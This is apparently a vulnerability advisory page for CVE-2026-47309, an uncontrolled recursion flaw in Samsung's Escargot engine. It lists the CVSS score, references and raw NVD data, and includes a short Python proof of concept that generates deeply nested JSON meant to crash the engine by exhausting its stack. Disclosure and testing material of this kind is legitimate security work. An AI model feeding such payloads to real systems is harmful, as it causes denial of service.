CVE-2026-47309

Description

Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Oversized Serialized Data Payloads. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Samsung Open Source Escargot commit 590345cc6258317c5da850d846ce6baaf2afc2d3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import json

# PoC Generator for CVE-2026-47309
# Generates a deeply nested JSON payload to trigger uncontrolled recursion.

def create_nested_payload(depth):
    """Recursively creates a nested dictionary structure."""
    if depth == 0:
        return "payload_end"
    return {"next": create_nested_payload(depth - 1)}

# Configuration: Depth large enough to exceed stack limits
# Suggested depth: 10000 or more depending on environment
NESTING_DEPTH = 10000

print(f"Generating nested payload with depth: {NESTING_DEPTH}")

try:
    malicious_data = create_nested_payload(NESTING_DEPTH)
    # In a real attack scenario, this serialized string would be fed to the vulnerable Escargot engine.
    json_payload = json.dumps(malicious_data)
    print(f"Payload generated. Size: {len(json_payload)} bytes.")
    # print(json_payload) # Caution: Printing this may freeze the console
except RecursionError as e:
    print(f"Local RecursionError detected: {e}")
    print("This indicates the payload structure is valid for testing recursion limits.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-47309
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-47309
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-47309/
[4] VulDB https://vuldb.com/cve/CVE-2026-47309
[5] https://github.com/Samsung/escargot/pull/1565

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-47309", "sourceIdentifier": "[email protected]", "published": "2026-05-19T07:16:29.813", "lastModified": "2026-05-19T14:25:40.320", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Oversized Serialized Data Payloads.\n\nThis issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-674"}]}], "references": [{"url": "https://github.com/Samsung/escargot/pull/1565", "source": "[email protected]"}]}}